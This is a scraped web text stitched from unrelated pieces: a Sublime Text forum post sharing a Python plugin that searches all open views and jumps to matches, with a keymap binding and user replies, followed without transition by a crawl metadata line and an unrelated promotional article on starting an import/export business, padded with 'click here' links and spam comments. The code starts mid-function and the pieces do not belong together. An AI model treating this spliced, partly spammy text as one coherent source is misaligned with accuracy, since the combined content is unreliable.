view.textPoint(row+1, 0) next_region = view.line(next_point) if next_region.begin() > last_region.end(): return next_region else: return False class SearchReboundCommand(sublimeplugin.TextCommand): def run(self, view, args): (file_and_line, sep, line_content) = args[0].partition(">") (file, sep, row) = file_and_line.rpartition("<") view_list = view.window().views() for a_view in view_list: print "|" + file + "|" + a_view.fileName() + "|" if file == a_view.fileName(): view.window().focusView(a_view) position = a_view.textPoint(int(row), 0) a_view.show(position) also add key binding on Default.sublime-keymap under "%appdata%\Sublime Text\Packages\User" <bindings> ... <binding key="ctrl+alt+f" command="search"/> ... </bindings> enjoy! one of the major features this editor missthanks !!! i also think that the quick panel results can be interactive, i.e. you can click them and get to the right location. if anyone know something about how to do it, you are welcome. EDIT: done, and updated another improvement, it now search for the selected text on current view (no need to copy it before). if no selection exists it will use the clipboard content as the pattern. EDIT: use the community repo, for latest including all the fixes (fixed some bugs since it was released).the link for the repo is at the first post. updated on repo Search In Open Viewsallows you to search any term on all your open files (views) download from sublimewiki changes:* revised the whole selection process, now uses an input bar.* after selecting the desired file/loaction the searched term will be marked rather than the whole line.
https://forum.sublimetext.com/t/search-all-open-tabs-plugin/133/3
CC-MAIN-2017-09
refinedweb
511
53.88
Anatomy of a Unit Test [This documentation is for preview only, and is subject to change in later releases. Blank topics are included as placeholders.] figure shows the first few lines of code, including the reference to the namespaces, the TestClassAttribute, and the TestContext class. See the walkthrough if you want code samples. figure shows the latter part of the code that is generated in the walkthrough, which includes the "Additional test attributes" section, the TestMethod attribute, and the logic of the method, which includes an Assert statement. this is to establish a known state for running your unit test. For example, you may use the [ClassInitialize()] or the [TestInitialize()] method to copy, alter, or create certain data files that your test will use. Create methods that are marked with either the [ClassCleanup()] or [TestCleanUp{}] attribute to return the environment to a known state after a test has run. This might mean the deletion of files in folders or the return of a database to a known state. An example of this is to reset an inventory database to an initial state after testing CreditTest unit test method as it was generated, including its TODO statements. However, we initialized the variables and replaced the Assert statement in the DebitTest test method. TODO statements act as reminders that you might want to initialize these lines of code. A note about naming conventions: The Visual Studio. Solution Items: Solution Items contains two files: Local.testsettings: These settings control how local tests that do not collect diagnostic data are run. Bank.vsmdi: This file contains information about test lists that are present in the solution and populates the Test List Editor window. TraceAndTestImpact.testsettings: These settings control how local tests that collect a specific set of diagnostic data are run..
http://msdn.microsoft.com/en-us/library/ms182517.aspx
CC-MAIN-2013-20
refinedweb
297
62.38
(Analysis by Nick Wu and Brian Dean) The critical observation for this problem is that an optimal rectangle must have a Holstein on each of its four sides. This motivates the following line-sweep solution: For every pair of horizontal lines that contains a Holstein, remove all cows that aren't between those two lines. Sweep from left-to-right, keeping track of how many Holsteins have been seen so far without a Guernsey. If we pre-sort all the cows, then the sweeping process takes linear-time, giving us an $O(n^3)$ solution, illustrated in the code below. This was fast enough to obtain full credit for the problem (the problem was intended to the "easier" of the gold problems on this contest). Faster solutions are possible. Here is a short description of one (of several) ways to achieve an $O(n^2 \log n)$ running time. Recall that the four sides of the optimal rectangle must contain Holsteins; let's denote these by $H_t$, $H_b$, $H_l$, and $H_r$, with $t$ meaning "top", $b$ meaning "bottom", $l$ meaning "left" and $r$ meaning "right". We first iterate over all possible choices for $H_b$, contributing $O(n)$ to our running time. Having now fixed $H_b = (x_b, y_b)$, we scan upward (having pre-sorted all points on $y$), adding all $H$'s to an STL set, $S$, keyed on $x$ coordinate. We also keep track of the $G$ with maximum $x$ coordinate less than $x_b$ (call it $g_l$) and the $G$ with minimum $x$ coordinate larger than $x_b$ (call it $g_r$). We use these values to restrict the entries in $S$ so they belong to the range $[g_l, g_r]$, by deleting the min or max from $S$ whenever these fall outside the range. Now for each $H$ we encouter, if it lies in the $x$ range $[g_l, g_r]$, we test the rectangle with this $H$ as $H_t$, and with the min and max entries in $S$ as $H_l$ and $H_r$. The best rectangle overall is returned. The total scanning time is $O(n \log n)$, for a total running time of $O(n^2 \log n)$. import java.io.*; import java.util.*; public class rectangle { public static void main(String[] args) throws IOException { BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); PrintWriter pw = new PrintWriter(new BufferedWriter(new OutputStreamWriter(System.out))); int n = Integer.parseInt(br.readLine()); State[] list = new State[n]; TreeSet<Integer> ys = new TreeSet<Integer>(); for(int a = 0; a < n; a++) { StringTokenizer st = new StringTokenizer(br.readLine()); int x = Integer.parseInt(st.nextToken()); int y = Integer.parseInt(st.nextToken()); list[a] = new State(x, y, st.nextToken().equals("H")); ys.add(y); } Arrays.sort(list); ArrayList<Integer> ysArray = new ArrayList<Integer>(); for(int y: ys) { ysArray.add(y); } int most = 0; int area = 0; for(int i = 0; i < ysArray.size(); i++) { for(int j = i+1; j < ysArray.size(); j++) { boolean valid = false; int lastX = -1; int now = 0; for(int a = 0; a < n;) { int b = a; int red = 0; int blue = 0; while(b < n && list[a].x == list[b].x) { if(list[b].y >= ysArray.get(i) && list[b].y <= ysArray.get(j)) { if(list[b].red) { red++; } else { blue++; } } b++; } if(blue > 0) { valid = false; now = 0; } else if(red + blue > 0) { if(!valid) { valid = true; lastX = list[a].x; } now += red; int currArea = (ysArray.get(j) - ysArray.get(i)) * (list[a].x - lastX); if(now > most || (now == most && currArea < area)) { most = now; area = currArea; } } a = b; } } } pw.println(most); pw.println(area); pw.close(); } static class State implements Comparable<State> { public int x,y; public boolean red; public State(int a, int b, boolean c) { x=a; y=b; red=c; } public int compareTo(State s) { return x - s.x; } } }
http://usaco.org/current/data/sol_cowrect_gold.html
CC-MAIN-2018-17
refinedweb
629
62.78
Introducing Gremlex An open source Gremlin server driver for Elixir Also written by Sam Havens. At CarLabs, we store our more complex conversation logic in AWS Neptune. We need to read from and write to Neptune from within our Elixir applications and we want to do this in a functional way that feels like idiomatic Elixir — and thus Gremlex was born. After a few months of using it in production, we are happy to present Gremlex to the rest of the Elixir community. It’s open-source, available on GitHub and Hex, and MIT-licensed. Creating queries Gremlex is easy to use if you know Gremlin and makes learning about Gremlin functions easy if you are a newcomer with the support of Elixir tools. Let’s take a Gremlin query: g.V().has("name","marko").out("knows").out("knows").values("name") and turn it into a Gremlex query: Graph.g() |> Graph.v() |> Graph.has("name", "marko") |> Graph.out("knows") |> Graph.out("knows") |> Graph.values("name") |> Client.query We also support nested queries. Let’s take a more complex example by writing a nested Gremlin query g.V(1).repeat(out()).times(2).path().by('name') which can be represented in Gremlex as Graph.g() |> Graph.v(1) |> Graph.repeat(Graph.g() |> Graph.out()) |> Graph.times(2) |> Graph.path() |> Graph.by("name") |> Client.query How does Gremlex work under the hood? Every query and subquery begins with Graph.g() which creates an Erlang queue. Each function takes a queue and 0 or more arguments. That function updates the queue by appending a tuple, where the first value in the tuple is the Gremlin function name and the second is its arguments. This allows Gremlex to easily build queries by passing them through a series of functions using the pipe operator. Once we call Client.query we compile the query to the Gremlin equivalent and make a request using that Gremlin query. This is cool, but can you just tell me exactly how to use it? First off, to use this Gremlin server driver, you need a Gremlin server running. If you haven’t done that before, see the instructions over on the Apache TinkerPop Getting Started page. To install Gremlex from Hex.pm: def deps do [ {:gremlex, "~> 0.2.0"} ] end You"}. Example Time Our goal is to create a vertex with a property, create a second vertex, and create a relationship between the two vertices. The following functions are not delivered with Gremlex, but this will give you a basic idea of how to use Gremlex in Elixir. Step 1 — Create an initial vertex: defmodule Gremlex.Medium do alias Gremlex.Graph alias Gremlex.Client def create_vertex(label) do Graph.g() |> Graph.add_v(label) |> Client.query() end ... end The function create_vertex takes in a label and creates a vertex with the given label. The return is a tuple of an atom :ok or :error and a list of Gremlex Vertices, or for our specific use case, the vertex that we created. Step 2 — Add a property defmodule Gremlex.Medium do ... def add_property(id, prop_name, prop_value) do Graph.g() |> Graph.v(id) |> Graph.property(prop_name, prop_value) |> Client.query() end ... end The function add_property takes a vertex id, a property name, and a property value. The return is a tuple of :ok and a list with our updated vertex with the new property that we added. Step 3 — Create a vertex and create a relationship defmodule Gremlex.Medium do ... def create_relationship({:ok, target}, source_id, edge_label) do Graph.g() |> Graph.v(source_id) |> Graph.add_e(edge_label) |> Graph.to(hd(target)) |> Client.query() end ... end The create_relationship function takes three parameters and pattern matches on {:ok, target}, a vertex id meant to be the source of the relationship, and a label name for the edge that will be created. In the example above, you can see that first we create a vertex and pass in the response to the create_relationship function. Since we are passing in a list of vertices as target, we are going to get the first element of the list as the target of the relationship. The return value of this function is a tuple with :ok and a list of Gremlex Edges which describes the relationship. Hopefully these examples give you a good basis on how to utilize Gremlex in your own applications. The Future We at CarLabs think that Elixir and graph databases are two underutilized pieces of technology, and we believe that both will continue to grow in popularity as more people are exposed to their power and ease-of-use. If you agree, then why not try out Gremlex today? Or even better, submit a PR — it’s early days, and there are still lots of beginner-friendly issues (there are harder issues too, if that’s your style). We’re a friendly bunch, so if you have questions, feel free to open an issue on GitHub or leave a comment here. And of course, if you’re a car manufacturer or dealer looking to transform the way you communicate with your shoppers, owners, and finance customers… we have a lot to talk about. Finally, special thanks to Becca Lasky for the amazing logo (seriously, if you have seen both the Elixir and TinkerPop logos, you realize how perfect it is), and to GitHub/@JohannesSoots for the big PR adding nested queries 👏👏👏
https://medium.com/carlabs/introducing-gremlex-6f685adf73bd
CC-MAIN-2019-18
refinedweb
893
64.2
Magic Free Code First Migrations This post is now out of date. Be sure to check out EF 4.3 Beta 1. <transparency>I work for Microsoft</transparency> (just kidding… but I couldn’t leave the tag open) We recently released a very early preview of Code First Migrations and it’s been getting some mixed feedback, the negative feedback falls into three buckets: - Stuff we have on the list but just haven’t done yet (i.e. Provider model, upgrade to specific named version, downgrade, outside of Visual Studio experience) - Things you want us to do differently (i.e. Get rid of those SQL scripts… I’m a developer not a DBA) - Functionality we did a bad job of explaining in the original posts (i.e. You don’t have to use the auto-magic behavior… you can have a script for every step if you want) This post is going to walkthrough what it looks like to use migrations without the magic, a.k.a “Rails style migrations”. Code First Migrations also doesn’t lock you into one approach so you could always decide that you trust the magic in the future, or you can trust the magic for certain migrations. One HUGE CAVEAT on this post is that all the scripts are going to be in SQL… one overwhelming bit of feedback we’ve heard is ‘get rid of the SQL… give me code’. You’re probably scratching you head asking ‘what exactly where those guys thinking when they used SQL scripts?’… we were thinking that folks would be more comfortable with the magic and that adding ‘custom scripts’ was going to be reserved for complex migration steps when you would likely need to drop to SQL anyway. Looks like we got that wrong (but that’s exactly why we ship CTPs). The plans we have around a provider model would make it very easy to swap in some other means of expressing the non-magical migrations… based on what we are hearing it looks we should be using code instead. Getting a Model - Create a new console application and install the EntityFramework.SqlMigrations package from ‘Package Manager Console’, this will also install the EntityFramework package: PM> Install-Package EntityFramework.SqlMigrations - Lets build a simple console app with a Code First model. Note that I’m also getting rid of other Code First magic by switching off database initializers and getting rid of the EdmMetadata table: using System; using System.Data.Entity; using System.Data.Entity.Infrastructure; namespace NoMagic { class Program { static void Main(string[] args) { // Don't do any database creation magic Database.SetInitializer<MyContext>(null); using (var db = new MyContext()) { foreach (var b in db.Books) { Console.WriteLine(b.Name); } } } } public class MyContext : DbContext { public DbSet<Book> Books { get; set; } protected override void OnModelCreating(DbModelBuilder modelBuilder) { // No EdmMetadata table please modelBuilder.Conventions.Remove<IncludeMetadataConvention>(); } } public class Book { public int BookId { get; set; } public string Name { get; set; } } } First Migration - We’re not using any magic, so we want a script that will handle database creation, we use the Add-CustomScript command for that: PM> Add-CustomScript –Name:”InitialCreate” Scaffolding custom script by comparing current model to database. Added custom script: Migrations\20110730045135_InitialCreate This adds a Migrations folder to our project with a sub-folder representing our script. The folder contains our script and also a Target.xml file… the Target.xml file is there to facilitate downgrade with automatic migrations… it’s always there in the CTP but in the next release we’ll only leave Target.xml around when you are actually using automatic migrations. The script is scaffolded with what migrations would have done if you wanted it to run automatically… I won’t cover the SQL vs Code point again here, see the top. I could edit the script at this point if I don’t like what it is doing. The script is quite verbose too… I’m just showing the bit that actually creates our table (Beware: Don’t try and remove all that SET <blah, blah, blah> stuff from the script… did I mention this is a super early preview). There is also a create statement for the __ModelSnapshot table which is how the database knows what version it is at etc.CREATE TABLE [dbo].[Books] ( [BookId] INT IDENTITY (1, 1) NOT NULL, [Name] NVARCHAR (MAX) NULL, PRIMARY KEY CLUSTERED ([BookId] ASC) ); - Now we can use the Update-Database command to run the script PM> Update-Database 1 pending custom scripts found. Processing custom script [20110730045135_InitialCreate]. - Executing custom script [20110730045135_InitialCreate]. - Creating NoMagic.MyContext... - Creating [dbo].[Books]... - Update complete. Ensuring database matches current model. - Database already matches model.Update-Database : Cannot open database "NoMagic.MyContext" requested by the login. The login failed. Login failed for user 'REDMOND\rowmil'. At line:1 char:16 + Update-Database <<<< + CategoryInfo : NotSpecified: (:) [Update-Database], SqlException + FullyQualifiedErrorId : System.Data.SqlClient.SqlException,System.Data.Entity.Migrations.Commands.MigrateCommand Ok, so the error is an annoying bug… but everything actually worked ok. It errored out during the automatic upgrade process… which wasn’t going to do anything because we aren’t using the magic. You’ll get this error when you run the first migration against a database that doesn’t exist. Migrations will actually create the empty database for you… is that more magic that you should be able to switch off? One thing that occurred to me while writing this post is that it would be great to have a way to prevent the automatic pipeline from ever kicking in just incase I accidently let it do something. Sounds like we need to have some settings defined in an xml config file your code. That’s pretty much it, we just repeat that process indefinitely. Second Migration - Let’s rename the Book.Name property to Title: public class Book { public int BookId { get; set; } public string Title { get; set; } } - We could just let migrations scaffold the script with a drop/add column and then manually edit the script… but let’s tell it to take the rename into account while scaffolding: PM> Add-CustomScript -Name:"RenameBookName" -Renames:"Book.Name=>Book.Title" Scaffolding custom script by comparing current model to database. Added custom script: Migrations\20110730051326_RenameBookName You’ll notice that migrations has added a Model.refactorlog file to your project… Model.refactorlog shouldn’t be there since we scaffolded a script rather than doing an automatic upgrade… another CTP thing that we’ll fix. Looking at the scaffolded script we see that it contains a rename rather than a drop create:EXECUTE sp_rename @objname = N'[dbo].[Books].[Name]', @newname = N'Title', @objtype = N'COLUMN'; - Now we can use Update-Database to run our script: PM> Update-Database 1 pending custom scripts found. Processing custom script [20110730051326_RenameBookName]. - Executing custom script [20110730051326_RenameBookName]. - Rename [dbo].[Books].[Name] to Title - Caution: Changing any part of an object name could break scripts and stored procedures. - Update complete. Ensuring database matches current model. - Database already matches model. Conclusion Code First Migrations supports automatic upgrade, custom scripts or a combination of both. We use SQL for the custom scripts at the moment but you are telling us they need to be code based. This is an early CTP which means it is full of rough edges… but that also means we are early enough in the release cycle to change things 15 Responses to “Magic Free Code First Migrations” Where's The Comment Form? Hi Rowan – I like the post :). I’m not ranting – hopefully not moaning or complaining. Caveats aside – the only feedback I have to give is that this stuff isn’t new. It’s been going on for years and years. I’ve actually written 3 migration tools myself – the last one was (literally) on a plane on my way home from MIX. It’s not that hard. And you guys are a LOT smarter than me. I understand you probably don’t want me to focus on the SQL scripting but… dude seriously. It doesn’t make a good demo if I throw a shoe on a plate and cover it with whip cream and call it a cake (this, I say with a smile… can you see it?). I know you guys are somewhat limited with what you can see, codewise, in other projects. However that doesn’t stop you from looking at how they work. The customer has spoken *already* – it’s easy to see what they want. You really don’t need to “solicit feedback” as it’s already *been solicited* in those other projects. And they’ve made it. Just make it for .NET as a starting point. And I think you’re team is smart – but I think you guys talk to each other too much. This is a solved problem – you should be on auto-pilot right now as your awesome team raises the temperature in Building 7 with your huge brain power. So – as politely as I can put it: Migrations have been around for 7 years. Just do what they do already – it’s a proven pattern. Call it CTP 2 and I promise I won’t make fun of you :). robconery July 29, 2011 Hi Rob, Thanks for taking the time to read and comment, totally hear you on all your comments. We’re taking a look at things at the moment and we’ll post with where we landed shortly. It seems that having code based scripts and the ability to switch off the automatic stuff will give most folks what they want. The places we are trying to do more than the existing migrations solutions is by integrating with Code First so that we can scaffold scripts for you based on the changes you made to classes and give you the *option* to let some parts be done automatically. If you take these out of the picture then there isn’t really much value in us rolling yet another migrations solution . I think we probably got over focused on these additions though and didn’t focus enough on getting the experience right for the bits that align with existing solutions. Obviously the SQL/code thing was just something we got wrong, the rest of the experience you and others are asking for is already there in the CTP (unless I am missing something else?). I think the other thing we did wrong was starting with the ‘voodoo magic’ in our walkthroughs etc. We should start with the familiar experience that just introduces the fact that we scaffold the scripts for you as a starting point. Then, for folks who want to, we should introduce the option to have parts of the migration process occur automatically. We’ll make sure we get the provider model into the next CTP too Thanks again for your feedback… keep it coming! ~Rowan romiller.com August 1, 2011 Compile list of all features of the major existing migrations frameworks. Let community vote on most wanted features. Implement. I couldn’t agree more with Rob, innovate and bring more to the .NET party that makes people go “wow look what those guys are doing!” but the main features should speak for themselves Matt Fitchett July 29, 2011 I am not going to put it politely. I am emotionally upset. Ive been developing .net for past 10 years since the beta. I love it but i hate how ms reinvents the wheel all the time again. Just like the other commenter. Stick to proven technology and make it better. You already got mvc, which is rails. Ef codefirst which resembles activerecord, nuget thats the gem system. These things are succesfull because they are proven. Raila migrations are code based, and just one file. You can make it better if you really want it that bad by generating a migration file from detected model change. If you say that you listen, please listen. Sorry for my tone but i think it need to be said. .net is a beatiful platform it should be a shame if it would go to waste. am leaving the platfom for this kind of solutions? Why does your te Emile July 29, 2011 Oops, Emile has left the platform! Sorry couldnt resist lol July 30, 2011 Yes lol, typing on iphone’s hard when just woke up Emile July 30, 2011 Honestly I have to wonder why everyone is so surprised, CTP1 is a natural extension to EF Code First – a framework that magically creates the database from the given models, there must be a fair amount of code behind that feature which isn’t going to be thrown out. There was every reason to expect automatic updating of the database rather than hand-coded change scripts. I’m not saying this is what I wanted, but it is what I expected. What I was hoping for (but haven’t had the time to check if it exists yet) is more customizable initializers. Last I checked I had to write a hefty amount of code to make what should be a simple change to the default provider. bzbetty July 30, 2011 IMHO a provider model (read extensibility and flexibility) should not be considered a Feature, as in “we’ll get to it”. It should have been the core on which this is built. hhariri July 30, 2011 [...]. [...] The Morning Brew - Chris Alcock » The Morning Brew #906 July 31, 2011 In response to your response: I think perhaps the impression that you guys aren’t listening comes from the fact that we don’t know if you’ve heard us until a release happens. Case in point, the migrations feature was first mentioned on the EF Design Blog in October of 2010. Then, we get total radio silence on the feature for about 8 months, then the CTP is released. I think that if you were to write a follow-up blog post, reiterating the most common feedback, and giving some indication whether any of those points will affect the direction the team takes as the feature is implemented. Then poke your head up every once in a while to give us an update, maybe something a little more substantial than “Yes, we’re still working on it.” That said, I appreciate the content in this post. It clears up some of the concerns I had about the current implementation that I emailed you about a few days ago. I’m really looking forward to how this shapes up as it moves toward RTM. Brian Sullivan August 1, 2011 Well – I’m obviously in the minority – but we NEED the SQL Code for the DB Migrations. We work in a large company – and we will need to hand SQL Scripts off to our DBA’s to actually apply against the DB. They will NOT allow us to hand them executable code to just run against the DB to do the changes. I’m pretty sure that this is pretty standard for a lot of large organizations. JimP August 2, 2011 We’ve summarized your feedback and what changes we are making in this post; romiller.com August 5, 2011 [...]. [...] Windows Azure and Cloud Computing Posts for 8/5/2011+ - Windows Azure Blog August 5, 2011 sweet the Ruby on Rails way..nice to see daniel glenn February 4, 2012 [...]. [...] Code First Migrations: Your Feedback - ADO.NET Blog - Site Home - MSDN Blogs August 20, 2012
http://romiller.com/2011/07/29/magic-free-code-first-migrations/
CC-MAIN-2013-48
refinedweb
2,571
63.09
Home > Blogs > 30 C++ Tips in 30 Days: Tip # 24 coping with incompatibilites between C99 and C++ C99 features such as restrict pointers, designated initializers and variable length arrays haven't been accepted into the C++ standard. Sadly, at this stage I can already tell you that C++09 will not support these features either. The incompatibility between the two languages should concern your if you intend to import a C source file into a C++ project. There are however workarounds. There's no point in apportioning the blame for the current grim state of affairs: for nearly 10 years, standard core C features aren't supported in C++, and that chasm isn't going to be fixed in the next revision of C++ known as C++09. What can you then when you migrate from C to C++ or wish to import a C source file into a C++ project? The first option is to stick right from the start to C94 or C89 exclusively in new C projects and avoid any C99 features. This will ensure that C code will compiler as C++ code without any problems. However, this approach isn't practical if you need to import a large amount of C99 code into C++, or when you truly need C99 features. Here's the secret: although C++ doesn't officially support many of the C99 features, many compilers have a C99 flag which you can set when compiling C++ code. This flag forces the C++ compiler to accept C99 features, treating them as non-standard C++ extensions. Notice that the C99 flag is switched off by default so you need to set it explicitly. Try to look for this hidden flag when you import C99 code into C++. At the moment, it's the most cost effective method of dealing with the discrepancies between the two languages. Take advantage of special member promotions, everyday discounts, quick access to saved content, and more! Join Today. Kotlin Programming: The Big Nerd Ranch Guide A Tour of C++, 2nd Edition
http://www.informit.com/blogs/blog.aspx?uk=30-C-Tips-in-30-Days-Tip-24-coping-with-incompatibilites-between-C99-and-C
CC-MAIN-2018-34
refinedweb
341
67.49
Flask is the one of the most popular micro Frame work which enable programmers to quickly build web applications. Linkedin, Pinterest are some of the finest example of this framework. The Frame work was initially coded by Armin Ronacher of Pocoo. Lets start with Installation Install Flask First up all you need to install python on your system, if you done’t have get one from . You can install Flask from Python Package Index which require the PIP command and a internet connection. Learn how to get PIP? Install flask using the following command line, the simplest way to install Flask on your system. On Windows go to your command prompt/shell and issue the pip command. D:/> pip install flask It will take some time to finish the procedures. Uninstalling Flask D:/> pip install flask will remove Flask packages from your system Create your first App Flask is Fun Create a file called hello.py from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return "Hello World!" if __name__ == "__main__": app.run() And Easy to Setup C:/> pip install Flask c:/> python hello.py * Running on Learn more about Flask
https://developerm.dev/2015/12/17/installing-python-flask-framework/
CC-MAIN-2021-17
refinedweb
193
75.81
write() Write bytes to a file Synopsis: #include <unistd.h> ssize_t write( int fildes, const void* buf, size_t nbytes ); Since: BlackBerry 10.0.0 Arguments: - fildes - The file descriptor for the file you want to write in. - buf - A pointer to a buffer that contains the data you want to write. - nbytes - The number of bytes to write. Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The write() function attempts to write nbytes bytes to the file associated with the open file descriptor, fildes, from the buffer pointed to by buf. If nbytesbytes, although it may be less than nbytesbytes is greater than INT_MAX, write() returns -1 and sets errno to EINVAL. See <limits.h>. Write requests to a pipe (or FIFO) are handled the same as a regular file, with the following exceptions: - There's no file offset associated with a pipe, therefore each write request appends to the end of the pipe. - Write requests of PIPE_BUF bytes or less aren process to block, but on normal completion it returns nbytes. - If the O_NONBLOCK flag is set, write requests are handled differently, in the following ways: - The write() function doesn't block the process. - Write requests for PIPE_BUF bytes or less either succeed completely and return nbytes, or return -1 and errno is set to EAGAIN. If you call write() with nbytes greater than PIPE_BUF bytes, it either transfers what it can and returns the number of bytes written, or transfers no data, returning -1 and setting errno to EAGAIN. Also, if nbytes the O_NONBLOCK flag is clear, write() blocks until the data can be accepted. - If the O_NONBLOCK flag is set, write() doesn't block the process. If some data can be written without blocking the process, write() transfers what it can and returns the number of bytes written. Otherwise, it returns -1 and sets errno to EAGAIN.. Errors: - EAGAIN - The O_NONBLOCK flag is set for the file descriptor, and the process would be delayed in the write operation. - EBADF - The file descriptor, fildes, isn't a valid file descriptor open for writing. - ECONNRESET - A write was attempted on a socket that isn't connected. -IO - One of the following: -. - The filesystem resides on a removable media device, and the media has been forcibly removed. - ENETDOWN - A write was attempted on a socket and the local network interface used to reach the destination is down. - ENETUNREACH - A write was attempted on a socket and no route to the network is present. - ENOSPC - There's no free space remaining on the device containing the file. - ENOSYS - The write() function isn't implemented for the filesystem specified by filedes. - ENXIO - One of the following occurred: - A request was made of a nonexistent device, or the request was outside the capabilities of the device. - A hangup occurred on the STREAM being written to. - EPIPE - One of the following occurred: - An attempt was made to write to a pipe (or FIFO) that isn't open for reading by any process, or that has only one end open. A SIGPIPE signal is also sent to the process. - A write was attempted on a socket that is shut down for writing, or is no longer connected. In the latter case, if the socket is of type SOCK_STREAM, a SIGPIPE signal is delivered to the calling process. - ERANGE - The transfer request size was outside the range supported by the STREAMS file associated with fildes. Examples: ; } Classification: Last modified: 2014-06-24 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/w/write.html
CC-MAIN-2014-42
refinedweb
605
72.26
$ wget Then install RSPython in R: # R CMD INSTALL --clean RSPython_0.5-1.tar.gz: $ export R_HOME=/usr/lib/R $ export PYTHONPATH=${R_HOME}/library/RSPython/Python $ export PYTHONPATH=${PYTHONPATH}:${R_HOME}/library/RSPython/libs $ export LD_LIBRARY_PATH=${R_HOME}/bin $ python Python 2.2.1 (#2, Sep 13 2002, 23:25:07) [GCC 2.95.4 20011002 (Debian prerelease)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import RS Initialized R-Python interface package. >>> RS.call("rnorm", 10) [-0.65567988872831473, 0.67905969371540564, -1.1444361954473865, 0.81452303045337249, 0.72703311800839554, 0.86401079894005484, -2.0267500136837922, 1.3879521193129922, -0.59819064121768595, 1.1045450495203162] >>> RS.call("plot", [1,2,3,4]) >>> RS.call("plot", RS.call("rnorm",10)) >>> ^D If you get: $ python >>> import RS Traceback (most recent call last): File "<stdin>", line 1, in ? File "/usr/lib/R/library/RSPython/Python/RS.py", line 1, in ? import RSInternal ImportError: /usr/lib/atlas/libblas.so.2: undefined symbol: e_wsfe >>> Then be sure that you don't have atlas2-base installed: $ wajig remove atlas2-base
https://www.linuxtopia.org/online_books/linux_beginner_books/debian_linux_desktop_survival_guide/Installing_RSPython.shtml
CC-MAIN-2021-39
refinedweb
168
53.27
(This article was first published on mages' blog, and kindly contributed to R-bloggers)The guys at Google continue to update and enhance the Chart Tools API. One new recent feature is a pie chart with a hole, or as some call them: donut charts. Thankfully the new functionality is being achieved through new options for the existing pie chart, which means that those new features are available in R via googleVis as well, without the need of writing new code. Doughnut chart exampleWith the German election coming up soon, here is the composition of the current parliament. Session Info.5 loaded via a namespace (and not attached): [1] RJSONIO_1.0-3 tools_3.0...
http://www.r-bloggers.com/doughnut-chart-in-r-with-googlevis/
CC-MAIN-2014-42
refinedweb
114
58.01
import export business74 Hi I Am Julie Talbot And Welcome To My Import Export site So you want to start an import export business, heres how to get started Click here to find out how to start an import export business Export products are commodities that are manufactured or produced domestically and sold outside the country. Because local sourcing of products for export is more intuitive and initially less cost intensive than international sourcing for import products, you will probably deal with product export before you deal with product import. To get started, you will identify a product or resource that is available in your immediate area and then to consider foreign markets - anywhere in the world - which would be receptive to this type of product. Once imported, these products have to be marketed and sold to a broker, buyer, distributor or retailer. Ideally the products you choose to import are products that aren't readily available, or that aren't produced in your country. These products are produced and often packaged in a foreign country. Imported products can be sourced from any country in the world to bring them to markets in your area. Find a product, find a market, find a buyer...that's it? Really, that is as simple a concept as this is. Clearly, the devil is in the details though, and you'll need a solid understanding of the nuts and bolts of this business to make it work. The objective of this book is to provide you with the information you need to get started. We'll discuss setting up you home office, sourcing and marketing products, shipping and customs, and many other topics that you need to understand in order to build a successful import / export business. To find out more about Importing and Exporting click here Finding a Product It could be something as simple as the little umbrella swizzle sticks for the local pubs, or the latest fad toy for kids... whatever it is, it's going to take some footwork on your part to find it and determine if it's the right product for your market. Don't take your mission lightly; taking the time to identify the right product is absolutely crucial if you want your business to succeed. Thorough research and an understanding of the market will yield a successful product. Use foresight and intuition to your advantage in this mission. Consider the following strategies: - Read business and trade magazines, the newspaper business section and other periodicals to keep on top news which may influence your decision. - Keep an eye on what the kids in your neighborhood are doing and wearing. Many trends start here... and if you can identify the trend before it becomes really hot, a lucrative opportunity may await. - Consider items which, rather than trendy and "hot", have the potential to be slower, but steady sellers. - When assessing a product for import potential, do the numbers. Take into consideration your cost and you selling cost it for. Clearly a higher profit margin is a point in favor of a potential import product. - Look for products of which you can maintain a steady supply. Avoid one-shot products unless you advertise it that way when you are marketing. Avoid disappointing customers by creating an expectation that you can provide them with a product which you may not be able to deliver. - Find matches. Identify sources that have a product they want to market, and find the market for them. These kinds of contacts can be found in trade newspapers or on the Internet. Don't be afraid to approach a local business that has a product which you feel would do well as an exported product. There are other ways to find a product for import. Think outside the box and exhaust all options and all opportunities to enhance your chances of success. The opportunities are out there, they just need to be found. Many import / export professionals enjoy this process more than any other related to their business. Finding a Market A potential market for your products may be found anywhere in the world. In an ideal market, the demand for your commodity is high because the product is not readily available locally. There may be many market matches for your export product, but expect to spend time and efforts researching and "qualifying" potential markets. Consider the following qualifying factors: - Can you provide a product that the market desires, in quantities to meet the potential demand? - Does the local economy indicate that your product is affordable locally? If the item is not a basic necessity, is local disposable income high enough that locals can purchase the product? - What cultural factors might influence local buying decisions? Be respectful of local traditions, holidays, customs and language nuances that can affect local perception of your product. Some strategies for finding markets: - Look in your own neighborhood to assess potential demand for a product which has not been met, then consider if you can meet that demand by importing a product. - Use the same strategies you used to research products, but work backwards and research markets instead. - Use the Internet to research markets. Cyberspace has a wealth of websites that can help connect you with qualified markets if you can provide a product. Once you've qualified a market that fits yours product, you'll want ot identify customers for your product. You have several avenues you can pursue: - Sell direct to retailers - Sell to product distributors, who act as middlemen and resell to retailers - Sell to trading companies who specialize in the buying and selling of import and export goods When making decisions to pursue specific customers, consider the customer's potential volume. Selling to multiple one-store retail accounts is overhead-intensive and does not generate the type of volume that results in significant profits. Building relationships with distribution companies or trading companies is likely your best bet. These type of accounts buy bulk orders of large quantities for distribution to smaller retail outlets. Individuals who are willing to work as distributor/agents for your product are also a good target. PrintShare it! — Rate it: up down [flag this hub] RSS for comments on this Hub a very useeful product to make skin fresh and clear. i desperately need this ebook.. is there a way i could buy this ebook thru cash payments? i mean, i'll send my payments thru moneytransfer.. is it possible? great resource, just what i was looking for . Good stuff, I have to agree wholeheartedly Wonderful information This is nice, but what about the import and export duty, clearing customs? How to ship. Never mind the product end of it. That is the easy part of the deal. pls give me the importer cvompanies of the philippines godd article Julie. My company has been fortunate enough to experience considerable export success. I would also recommend that any interested in exporting contact their local government department for additional assistanc. Also other bodies such as the embassy's and conuslate for the country of interest. You will find they have access to some fantastic data that will assist your research on marketing viability and trends before committing too;} --> These are challenging times for supply chain managers, logistics service and manufacturers.. Freightgate’s GTM-Trek! Global Tender Management 